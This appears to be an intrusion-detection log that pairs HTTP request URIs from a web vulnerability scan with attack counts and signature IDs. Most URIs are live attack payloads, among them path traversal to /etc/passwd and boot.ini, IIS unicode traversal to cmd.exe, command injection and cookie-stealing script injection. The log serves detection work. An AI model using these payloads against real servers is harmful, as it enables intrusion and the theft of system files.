Packet [1852]	Uri [/htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [4]	Signatures	[300000051]	[300000052]	[300001493]	[300002823]
Packet [1857]	Uri [/ht_root/wwwroot/-/local/httpd$map.conf]	Nattacks [1]	Signatures	[300001517]
Packet [1859]	Uri [/HyperStat/staSensePostNotThereNoNo.log]	Nattacks [1]	Signatures	[300001518]
Packet [1860]	Uri [/hyperstat/staSensePostNotThereNoNo.log]	Nattacks [1]	Signatures	[300001518]
Packet [1861]	Uri [/HyperStat/stat_what.log]	Nattacks [1]	Signatures	[300001518]
Packet [1862]	Uri [/hyperstat/stat_what.log]	Nattacks [1]	Signatures	[300001518]
Packet [1870]	Uri [/IDSWebApp/IDSjsp/Login.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1871]	Uri [/IDSWebApp/IDSjsp/LogSensePostNotThereNoNo.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1873]	Uri [/iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [1]	Signatures	[300001562]
Packet [1874]	Uri [/iisadmpwd/..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[300000067]	[300001562]
Packet [1887]	Uri [/iissamples/exair/howitworks/Winmsdp.exe]	Nattacks [1]	Signatures	[300001562]
Packet [1891]	Uri [/iissamples/exair/search/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [1894]	Uri [/iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [1897]	Uri [/iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [1901]	Uri [/iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [1904]	Uri [/iissamples/issamples/Winmsdp.exe]	Nattacks [1]	Signatures	[300001562]
Packet [1911]	Uri [/iissamples/sdk/asp/docs/Winmsdp.exe]	Nattacks [1]	Signatures	[300001562]
Packet [1912]	Uri [/iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp]	Nattacks [1]	Signatures	[300001562]
Packet [1913]	Uri [/iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp]	Nattacks [1]	Signatures	[300001562]
Packet [1914]	Uri [/iissamples/sdk/asp/docs/WinSensePostNotThereNoNo.exe]	Nattacks [1]	Signatures	[300001562]
Packet [1915]	Uri [/iissamples/sdk/asp/docs/WinSensePostNotThereNoNo.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp]	Nattacks [1]	Signatures	[300001562]
Packet [1921]	Uri [/images/?pattern=/etc/*&sort=name]	Nattacks [2]	Signatures	[300000039]	[300002734]
Packet [1936]	Uri [/inc/sendmail.inc]	Nattacks [1]	Signatures	[300001517]
Packet [1950]	Uri [/index.html.bak]	Nattacks [1]	Signatures	[300001927]
Packet [1983]	Uri [/index.html~]	Nattacks [1]	Signatures	[300001500]
Packet [1984]	Uri [/index.jsp%00x]	Nattacks [2]	Signatures	[300001359]	[300001516]
Packet [1991]	Uri [/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [1992]	Uri [/index.php?download=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [1997]	Uri [/index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [1998]	Uri [/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [1999]	Uri [/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [2001]	Uri [/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [2002]	Uri [/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [2003]	Uri [/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [2004]	Uri [/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [2005]	Uri [/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [2006]	Uri [/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [2007]	Uri [/index.php?page=../../../../../../../../../../boot.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [2008]	Uri [/index.php?page=../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [2010]	Uri [/index.php?SqlQuery=test%20]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [2012]	Uri [/index.php?tampon=test%20]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [2013]	Uri [/index.php?topic=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;%20]	Nattacks [3]	Signatures	[300000051]	[300000508]	[300000550]
Packet [2014]	Uri [/index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;]	Nattacks [3]	Signatures	[300000051]	[300000508]	[300000550]
Packet [2015]	Uri [/index.php?|=../../../../../../../../../etc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [2034]	Uri [/instaboard/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [2035]	Uri [/instaboard/indSensePostNotThereNoNo.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [2040]	Uri [/internal.sws?../../winnt/win.ini]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [2044]	Uri [/interscan/cgi-bin/FtpSave.dll?I'm%20Here]	Nattacks [2]	Signatures	[300000052]	[300001562]
Packet [2053]	Uri [/isapi/count.pl?]	Nattacks [1]	Signatures	[300001513]
Packet [2054]	Uri [/isapi/couSensePostNotThereNoNot.pl?]	Nattacks [1]	Signatures	[300001513]
Packet [2055]	Uri [/isapi/tstisapi.dll]	Nattacks [1]	Signatures	[300001562]
Packet [2076]	Uri [/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001516]
Packet [2077]	Uri [/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001516]	[300001559]
Packet [2078]	Uri [/jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../boot.ini]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001516]
Packet [2079]	Uri [/jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001516]	[300001559]
Packet [2083]	Uri [/k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [2099]	Uri [/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [2307]	Uri [/local/httpd$map.conf]	Nattacks [1]	Signatures	[300001517]
Packet [2316]	Uri [/logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00|]	Nattacks [7]	Signatures	[300000057]	[300000067]	[300001053]	[300001145]	[300001359]	[300001513]	[300001559]
Packet [2326]	Uri [/logicworks.ini]	Nattacks [1]	Signatures	[300001517]
Packet [2327]	Uri [/login.cgi?username=&command=simple&do=edit&password=&file=|id|]	Nattacks [1]	Signatures	[300001513]
Packet [2328]	Uri [/login.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [2342]	Uri [/logs/strSensePostNotThereNoNo.log]	Nattacks [1]	Signatures	[300001518]
Packet [2343]	Uri [/logs/str_err.log]	Nattacks [1]	Signatures	[300001518]
Packet [2370]	Uri [/mailman/options/yourlist?language=en&email=&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;]	Nattacks [3]	Signatures	[300000051]	[300000052]	[300000508]
Packet [2371]	Uri [/mailview.cgi?cmd=view&amp;fldrname=inbox&amp;select=1&amp;html=../../../../../../etc/passwd]	Nattacks [6]	Signatures	[300000051]	[300000057]	[300000067]	[300001145]	[300001513]	[300001559]
Packet [2374]	Uri [/mall_log_files/order.log]	Nattacks [1]	Signatures	[300001518]
Packet [2375]	Uri [/mall_log_files/ordSensePostNotThereNoNo.log]	Nattacks [1]	Signatures	[300001518]
Packet [2376]	Uri [/mambo/administrator/phpinfo.php]	Nattacks [1]	Signatures	[300001887]
Packet [2401]	Uri [/mcartfree/database/metacart.mdb]	Nattacks [2]	Signatures	[300001034]	[300001526]
Packet [2402]	Uri [/mcartfree/database/metSensePostNotThereNoNo.mdb]	Nattacks [2]	Signatures	[300001034]	[300001526]
Packet [2403]	Uri [/megabook/files/20/setSensePostNotThereNoNop.db]	Nattacks [1]	Signatures	[300001526]
Packet [2404]	Uri [/megabook/files/20/setup.db]	Nattacks [1]	Signatures	[300001526]
Packet [2407]	Uri [/members.asp?SF=%22;}alert('Vulnerable');function%20x(){v%20=%22]	Nattacks [3]	Signatures	[300000051]	[300000052]	[300000508]
Packet [2415]	Uri [/metacart/database/metacart.mdb]	Nattacks [2]	Signatures	[300001034]	[300001526]
Packet [2416]	Uri [/metacart/database/metSensePostNotThereNoNo.mdb]	Nattacks [2]	Signatures	[300001034]	[300001526]
Packet [2417]	Uri [/midicart.mdb]	Nattacks [1]	Signatures	[300001526]
Packet [2418]	Uri [/MIDICART/midicart.mdb]	Nattacks [1]	Signatures	[300001526]
Packet [2419]	Uri [/MIDICART/midSensePostNotThereNoNo.mdb]	Nattacks [1]	Signatures	[300001526]
Packet [2421]	Uri [/ministats/admin.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [2422]	Uri [/ministats/admSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [2425]	Uri [/MKGOHX.cfm?mode=debug]	Nattacks [1]	Signatures	[300001516]
Packet [2434]	Uri [/modif_infos.asp?n=%60/etc/passwd%60]	Nattacks [1]	Signatures	[300001559]
Packet [2435]	Uri [/modif_infos.asp?n=....//....//....//....//....//....//....//etc.passwd]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [2436]	Uri [/modif_infos.asp?n=../../../../../../../../../etc/passwd%00]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [2437]	Uri [/modif_infos.asp?n=/....../boot.ini]	Nattacks [1]	Signatures	[300000067]
Packet [2438]	Uri [/modif_infos.asp?n=/.../.../.../.../.../.../boot.ini]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [2439]	Uri [/modif_infos.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [2440]	Uri [/modif_infos.asp?n=/../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [2441]	Uri [/modif_infos.asp?n=/.\./.\./.\./.\./.\./boot.ini]	Nattacks [2]	Signatures	[300000057]	[300001145]
Packet [2442]	Uri [/modif_infos.asp?n=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [2443]	Uri [/modif_infos.asp?n=/etc/passwd%00]	Nattacks [3]	Signatures	[300001359]	[300001559]	[300002734]
Packet [2445]	Uri [/mods/apage/apage.cgi?f=file.htm.|id|]	Nattacks [1]	Signatures	[300001513]
Packet [2454]	Uri [/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [2455]	Uri [/modules/Downloads/voteinclude.php+]	Nattacks [1]	Signatures	[300001512]
Packet [2461]	Uri [/modules/WebChat/in.php+]	Nattacks [1]	Signatures	[300001512]
Packet [2469]	Uri [/modules/Your_Account/navbar.php+]	Nattacks [1]	Signatures	[300001512]
Packet [2476]	Uri [/mpcsoftweb_guestbook/database/mpcSensePostNotThereNoNo.mdb]	Nattacks [2]	Signatures	[300001034]	[300001526]
Packet [2477]	Uri [/mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb]	Nattacks [2]	Signatures	[300001034]	[300001526]
Packet [2479]	Uri [/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [1]	Signatures	[300001562]
Packet [2480]	Uri [/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001562]
Packet [2481]	Uri [/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[300000067]	[300001562]
Packet [2482]	Uri [/msadc/msadcs.dll]	Nattacks [1]	Signatures	[300001562]
Packet [2483]	Uri [/msadc/msaSensePostNotThereNoNo.dll]	Nattacks [1]	Signatures	[300001562]
Packet [2487]	Uri [/msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [2499]	Uri [/musicqueue.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [2508]	Uri [/myinvoicer/config.inc]	Nattacks [2]	Signatures	[300001517]	[300002829]
Packet [2509]	Uri [/mylog.phtml?screen=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [2510]	Uri [/myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent]	Nattacks [3]	Signatures	[300000051]	[300000508]	[300000550]
Packet [2511]	Uri [/myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=]	Nattacks [4]	Signatures	[300000051]	[300000052]	[300000053]	[300000508]
Packet [2512]	Uri [/mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001820]
Packet [2523]	Uri [/netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [2524]	Uri [/netget?sid=user&msg=300&file=../../../../../../../../../boot.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [2530]	Uri [/news/news.mdb]	Nattacks [1]	Signatures	[300001526]
Packet [2531]	Uri [/news/newSensePostNotThereNoNo.mdb]	Nattacks [1]	Signatures	[300001526]
Packet [2533]	Uri [/newuser?Image=../../database/rbsserv.mdb]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001034]	[300001145]
Packet [2545]	Uri [/nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001513]
Packet [2546]	Uri [/nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001513]	[300001559]
Packet [2601]	Uri [/nul..cfm]	Nattacks [1]	Signatures	[300001516]
Packet [2603]	Uri [/nul.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [2612]	Uri [/oem_webstage/oem.conf]	Nattacks [1]	Signatures	[300001517]
Packet [2613]	Uri [/officescan/cgi/cgiChkMasterPwd.exe]	Nattacks [1]	Signatures	[300001562]
Packet [2614]	Uri [/officescan/cgi/cgiSensePostNotThereNoNo.exe]	Nattacks [1]	Signatures	[300001562]
Packet [2615]	Uri [/officescan/cgi/jdkRqNotify.exe]	Nattacks [1]	Signatures	[300001562]
Packet [2616]	Uri [/officescan/cgi/jdkSensePostNotThereNoNo.exe]	Nattacks [1]	Signatures	[300001562]
Packet [2617]	Uri [/officescan/hotdownload/ofscan.ini]	Nattacks [1]	Signatures	[300001517]
Packet [2618]	Uri [/officescan/hotdownload/ofsSensePostNotThereNoNo.ini]	Nattacks [1]	Signatures	[300001517]
Packet [2619]	Uri [/ojspdemos/basic/hellouser/hellouser.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [2620]	Uri [/ojspdemos/basic/simple/usebean.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [2621]	Uri [/ojspdemos/basic/simple/welcomeuser.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [2624]	Uri [/opendir.php?/etc/passwd]	Nattacks [1]	Signatures	[300001559]
Packet [2625]	Uri [/opendir.php?requesturl=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [2626]	Uri [/OpenFile.aspx?file=../../../../../../../../../../boot.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [2629]	Uri [/options.inc.php+]	Nattacks [1]	Signatures	[300001512]
Packet [2633]	Uri [/order/order_log.dat]	Nattacks [1]	Signatures	[300001562]
Packet [2634]	Uri [/order/order_log_v12.dat]	Nattacks [1]	Signatures	[300001562]
Packet [2635]	Uri [/order/ordSensePostNotThereNoNo.dat]	Nattacks [1]	Signatures	[300001562]
Packet [2639]	Uri [/orders/mountain.cfg]	Nattacks [1]	Signatures	[300001506]
Packet [2640]	Uri [/orders/mouSensePostNotThereNoNo.cfg]	Nattacks [1]	Signatures	[300001506]
Packet [2641]	Uri [/orders/orders.log]	Nattacks [1]	Signatures	[300001518]
Packet [2643]	Uri [/Orders/order_log.dat]	Nattacks [1]	Signatures	[300001562]
Packet [2644]	Uri [/orders/order_log.dat]	Nattacks [1]	Signatures	[300001562]
Packet [2645]	Uri [/Orders/order_log_v12.dat]	Nattacks [1]	Signatures	[300001562]
Packet [2646]	Uri [/orders/order_log_v12.dat]	Nattacks [1]	Signatures	[300001562]
Packet [2647]	Uri [/Orders/ordSensePostNotThereNoNo.dat]	Nattacks [1]	Signatures	[300001562]
Packet [2648]	Uri [/orders/ordSensePostNotThereNoNo.dat]	Nattacks [1]	Signatures	[300001562]
Packet [2649]	Uri [/orders/ordSensePostNotThereNoNo.log]	Nattacks [1]	Signatures	[300001518]
Packet [2655]	Uri [/ows-bin/oaskill.exe?abcde.exe]	Nattacks [1]	Signatures	[300001562]
Packet [2656]	Uri [/ows-bin/oasnetconf.exe?-l%20-s%20BlahBlah]	Nattacks [1]	Signatures	[300001562]
Packet [2657]	Uri [/ows-bin/oasSensePostNotThereNoNo.exe?-l%20-s%20BlahBlah]	Nattacks [1]	Signatures	[300001562]
Packet [2658]	Uri [/ows-bin/oasSensePostNotThereNoNo.exe?abcde.exe]	Nattacks [1]	Signatures	[300001562]
Packet [2659]	Uri [/ows-bin/perlidlc.bat?&dir]	Nattacks [1]	Signatures	[300001562]
Packet [2665]	Uri [/page.cgi?../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001513]	[300001559]
Packet [2668]	Uri [/parse_xml.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [2674]	Uri [/password.inc]	Nattacks [1]	Signatures	[300001517]
Packet [2680]	Uri [/pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [1]	Signatures	[300001562]
Packet [2681]	Uri [/pbserver/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[300000067]	[300001562]
Packet [2682]	Uri [/pbserver/pbserver.dll]	Nattacks [1]	Signatures	[300001562]
Packet [2683]	Uri [/pbserver/pbsSensePostNotThereNoNo.dll]	Nattacks [1]	Signatures	[300001562]
Packet [2684]	Uri [/pccsmysqladm/incs/dbconnect.inc]	Nattacks [1]	Signatures	[300001517]
Packet [2685]	Uri [/pccsmysqladm/incs/dbcSensePostNotThereNoNo.inc]	Nattacks [1]	Signatures	[300001517]
Packet [2687]	Uri [/PDG_Cart/oder.log]	Nattacks [1]	Signatures	[300001518]
Packet [2688]	Uri [/PDG_Cart/odeSensePostNotThereNoNo.log]	Nattacks [1]	Signatures	[300001518]
Packet [2689]	Uri [/PDG_Cart/shopper.conf]	Nattacks [1]	Signatures	[300001517]
Packet [2692]	Uri [/perl/-e%20%22system('cat%20/etc/passwd');\%22]	Nattacks [4]	Signatures	[300000051]	[300000052]	[300001026]	[300001559]
Packet [2694]	Uri [/perl/env.pl]	Nattacks [1]	Signatures	[300001513]
Packet [2695]	Uri [/perl/files.pl]	Nattacks [1]	Signatures	[300001513]
Packet [2696]	Uri [/perl/filSensePostNotThereNoNos.pl]	Nattacks [1]	Signatures	[300001513]
Packet [2697]	Uri [/perl/samples/env.pl]	Nattacks [1]	Signatures	[300001513]
Packet [2698]	Uri [/perl/samples/lancgi.pl]	Nattacks [1]	Signatures	[300001513]
Packet [2699]	Uri [/perl/samples/ndslogin.pl]	Nattacks [1]	Signatures	[300001513]
Packet [2700]	Uri [/perl/samples/volscgi.pl]	Nattacks [1]	Signatures	[300001513]
Packet [2702]	Uri [/perl5/files.pl]	Nattacks [1]	Signatures	[300001513]
Packet [2703]	Uri [/perl5/filSensePostNotThereNoNos.pl]	Nattacks [1]	Signatures	[300001513]
Packet [2707]	Uri [/photo/manage.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [2708]	Uri [/photo/manSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [2710]	Uri [/photodata/manage.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [2711]	Uri [/photodata/manSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [2715]	Uri [/php.ini]	Nattacks [1]	Signatures	[300001517]
Packet [2723]	Uri [/php/mylog.phtml?screen=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [2724]	Uri [/php/php.exe?c:\boot.ini]	Nattacks [1]	Signatures	[300001562]
Packet [2725]	Uri [/php/php.exe?c:\winnt\boot.ini]	Nattacks [1]	Signatures	[300001562]
Packet [2726]	Uri [/php/php4ts.dll]	Nattacks [1]	Signatures	[300001562]
Packet [2727]	Uri [/php/phpSensePostNotThereNoNo.dll]	Nattacks [1]	Signatures	[300001562]
Packet [2729]	Uri [/phpBB/phpinfo.php]	Nattacks [1]	Signatures	[300001887]
Packet [2736]	Uri [/phpinfo.php]	Nattacks [1]	Signatures	[300001887]
Packet [2737]	Uri [/phpinfo.php3]	Nattacks [1]	Signatures	[300001887]
Packet [2739]	Uri [/phpmyadmin/]	Nattacks [1]	Signatures	[300001843]
Packet [2740]	Uri [/phpmyadmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001820]	[300001843]
Packet [2744]	Uri [/phprocketaddin/?page=../../../../../../../../../../boot.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [2745]	Uri [/phprocketaddin/?page=../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [2748]	Uri [/phptonuke.php?filnavn=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [2749]	Uri [/phpwebfilemgr/index.php?f=../../../../../../../../../etc]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [2750]	Uri [/phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [2751]	Uri [/phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=]	Nattacks [1]	Signatures	[300001359]
Packet [2760]	Uri [/pls/sample/admin_/help/..%255cplsql.conf]	Nattacks [1]	Signatures	[300001517]
Packet [2789]	Uri [/productcart/database/EIPC.mdb]	Nattacks [2]	Signatures	[300001034]	[300001526]
Packet [2790]	Uri [/productcart/database/EIPSensePostNotThereNoNo.mdb]	Nattacks [2]	Signatures	[300001034]	[300001526]
Packet [2814]	Uri [/prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [2815]	Uri [/PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [2816]	Uri [/pt_config.inc]	Nattacks [2]	Signatures	[300001517]	[300002829]
Packet [2818]	Uri [/pub/english.cgi?op=rmail]	Nattacks [1]	Signatures	[300001513]
Packet [2819]	Uri [/pub/engSensePostNotThereNoNo.cgi?op=rmail]	Nattacks [1]	Signatures	[300001513]
Packet [2828]	Uri [/put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]	[300001562]
Packet [2838]	Uri [/pwd.db]	Nattacks [1]	Signatures	[300001526]
Packet [2841]	Uri [/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [2848]	Uri [/quikmail/nph-emumail.cgi?type=../%00]	Nattacks [4]	Signatures	[300000067]	[300001145]	[300001359]	[300001513]
Packet [2849]	Uri [/quikmail/nphSensePostNotThereNoNo.cgi?type=../%00]	Nattacks [4]	Signatures	[300000067]	[300001145]	[300001359]	[300001513]
Packet [2850]	Uri [/quikstore.cfg]	Nattacks [1]	Signatures	[300001506]
Packet [2851]	Uri [/quikstore.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [2866]	Uri [/reviews/newpro.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [2867]	Uri [/reviews/newSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [2869]	Uri [/ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00]	Nattacks [6]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001513]	[300001559]
Packet [2873]	Uri [/rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [1]	Signatures	[300001562]
Packet [2874]	Uri [/rpc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[300000067]	[300001562]
Packet [2875]	Uri [/rtm.log]	Nattacks [1]	Signatures	[300001518]
Packet [2897]	Uri [/sca/menu.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [2904]	Uri [/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [1]	Signatures	[300001562]
Packet [2905]	Uri [/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver]	Nattacks [1]	Signatures	[300001562]
Packet [2906]	Uri [/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[300000067]	[300001562]
Packet [2907]	Uri [/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[300000067]	[300001562]
Packet [2908]	Uri [/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\]	Nattacks [2]	Signatures	[300000067]	[300001562]
Packet [2909]	Uri [/scripts/admin.pl]	Nattacks [1]	Signatures	[300001513]
Packet [2910]	Uri [/scripts/admSensePostNotThereNoNon.pl]	Nattacks [1]	Signatures	[300001513]
Packet [2911]	Uri [/scripts/Carello/Carello.dll]	Nattacks [1]	Signatures	[300001562]
Packet [2912]	Uri [/scripts/Carello/CarSensePostNotThereNoNo.dll]	Nattacks [1]	Signatures	[300001562]
Packet [2913]	Uri [/scripts/cfgSensePostNotThereNoNo.exe]	Nattacks [1]	Signatures	[300001562]
Packet [2914]	Uri [/scripts/cfgwiz.exe]	Nattacks [1]	Signatures	[300001562]
Packet [2915]	Uri [/scripts/CGImail.exe]	Nattacks [1]	Signatures	[300001562]
Packet [2916]	Uri [/scripts/CGISensePostNotThereNoNo.exe]	Nattacks [1]	Signatures	[300001562]
